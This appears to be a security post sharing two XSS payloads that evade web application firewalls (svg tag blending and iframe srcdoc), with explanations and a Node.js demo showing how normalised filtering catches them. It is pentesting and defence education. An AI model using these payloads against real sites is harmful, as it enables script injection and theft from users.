# Week 46 - XSS Payloads

It’s been a while since I’ve shared some Cross-Site Scripting payloads with y’all, so here are some new ones I’ve found in the last couple of months:

`<svg onload=location=nextSibling.innerText>`\
`<b>javas<b></b>cript:al<b></b>ert(1)</b>`

This one is really interesting as it implements Tag Blending Obfuscation. Notice that the keywords ‘javascript’ and ‘alert’ are split by empty `<b></b>` elements, so a WAF that looks for those strings in the raw request never sees them whole. When the payload executes, the `svg` element’s `onload` handler sets `location` to `nextSibling.innerText`: the `innerText` of the outer `<b>` is the text of its child nodes joined together, the empty `<b></b>` elements contribute nothing, and the result is `javascript:alert(1)`. Navigating to that URL gives a good old alert box. You can read more about this technique here: <https://lnkd.in/eqhpG_nJ>

This next payload was introduced to me by my colleague [Evan Isaac](https://www.linkedin.com/in/ACoAADKz8eYBPIfHIl7zo0z4G-5tn0BctweNrFI):

`"><iframe srcdoc="<script>alert(1)</script>">`

This is a great payload for when a WAF is blocking HTML event attributes (onclick, onmouseover, etc.) as well as standard script tags. Two things worth knowing about it: the `srcdoc` attribute value is HTML-decoded before it is parsed as a document, so `&lt;script&gt;alert(1)&lt;/script&gt;` works just as well as the literal form when a filter is matching on `<script`, and an `srcdoc` iframe runs in the same origin as the page that embeds it, so script inside it has the same access to the parent’s DOM and cookies as script in the page itself. Give this a try on your next engagement, and give Evan a follow for sharing!

See more here: <https://brutelogic.com.br/blog/tag-blending-obfuscation/>
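To make the bypass concrete from the defender’s side, here is an added example (my own code, not from the post or from Brute Logic) that runs in plain Node.js with no browser. It takes the two payloads above exactly as written, plus an entity-encoded `srcdoc` variant that I constructed, and checks them against two small rule sets that I made up to stand in for the WAF behaviour the post describes: keyword rules for the tag-blending payload, tag/event-handler rules for the `srcdoc` payload. `textContentOf()` and `srcdocValues()` only approximate what the browser does for these particular payloads (text-node concatenation for `innerText`, entity decoding of the `srcdoc` attribute); they are not a general HTML parser.

```javascript
// Added example, not from the original post. Shows why a signature check
// on the raw request misses both payloads, and what it has to normalise
// first. Pure Node.js; the helpers approximate the browser for these two
// payloads only and are not a general HTML parser.

// Payload 1 from the post (tag blending), as a single string.
const TAG_BLENDING_PAYLOAD =
  '<svg onload=location=nextSibling.innerText>' +
  '<b>javas<b></b>cript:al<b></b>ert(1)</b>';

// Payload 2 from the post, plus an entity-encoded variant (constructed
// here) that a rule matching a literal "<script" cannot see.
const SRCDOC_PAYLOAD = '"><iframe srcdoc="<script>alert(1)</script>">';
const ENCODED_SRCDOC_PAYLOAD =
  '"><iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">';

// Made-up rule sets standing in for the WAF behaviour the post describes.
const KEYWORD_RULES = [/javascript:/i, /alert\s*\(/i]; // what payload 1 evades
const TAG_RULES = [/<script/i, /\bon\w+\s*=/i];        // what payload 2 evades

// Naive WAF: does any rule match the input exactly as received?
function matchesAny(rules, input) {
  return rules.some((re) => re.test(input));
}

// Browser view for payload 1: innerText of the outer <b> is the text of its
// child nodes joined together, and the empty <b></b> elements add nothing,
// so stripping tags reassembles "javascript:alert(1)".
function textContentOf(html) {
  return html.replace(/<[^>]*>/g, '');
}

// Browser view for payload 2: the srcdoc attribute value is entity-decoded
// and only then parsed as a complete HTML document.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (whole, ref) => {
    if (ref[0] === '#') {
      const code = ref[1].toLowerCase() === 'x'
        ? parseInt(ref.slice(2), 16)
        : parseInt(ref.slice(1), 10);
      return String.fromCodePoint(code);
    }
    return named[ref.toLowerCase()] ?? whole;
  });
}

// Decoded value of every double-quoted srcdoc attribute in the input.
function srcdocValues(html) {
  const values = [];
  const attr = /srcdoc\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = attr.exec(html)) !== null) values.push(decodeEntities(m[1]));
  return values;
}

// Every form the browser will effectively evaluate. A WAF that inspects
// only views[0] (the raw input) is the one these payloads get past.
function browserViews(input) {
  return [input, textContentOf(input), ...srcdocValues(input)];
}

function normalizedMatch(rules, input) {
  return browserViews(input).some((view) => matchesAny(rules, view));
}

// Stand-alone demo: raw check vs. normalised check for each payload.
for (const [name, rules, payload] of [
  ['tag blending vs keyword rules', KEYWORD_RULES, TAG_BLENDING_PAYLOAD],
  ['srcdoc (literal) vs tag rules', TAG_RULES, SRCDOC_PAYLOAD],
  ['srcdoc (encoded) vs tag rules', TAG_RULES, ENCODED_SRCDOC_PAYLOAD],
]) {
  console.log(`${name}: raw=${matchesAny(rules, payload)}`
    + ` normalised=${normalizedMatch(rules, payload)}`);
}
```

The raw check misses the tag-blending payload and the encoded `srcdoc` payload; the same rules catch both once the input is looked at the way the browser will see it. The lesson is the same one the two payloads teach from the attacker’s side: signature matching on the request as received is only as good as the normalisation that precedes it.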

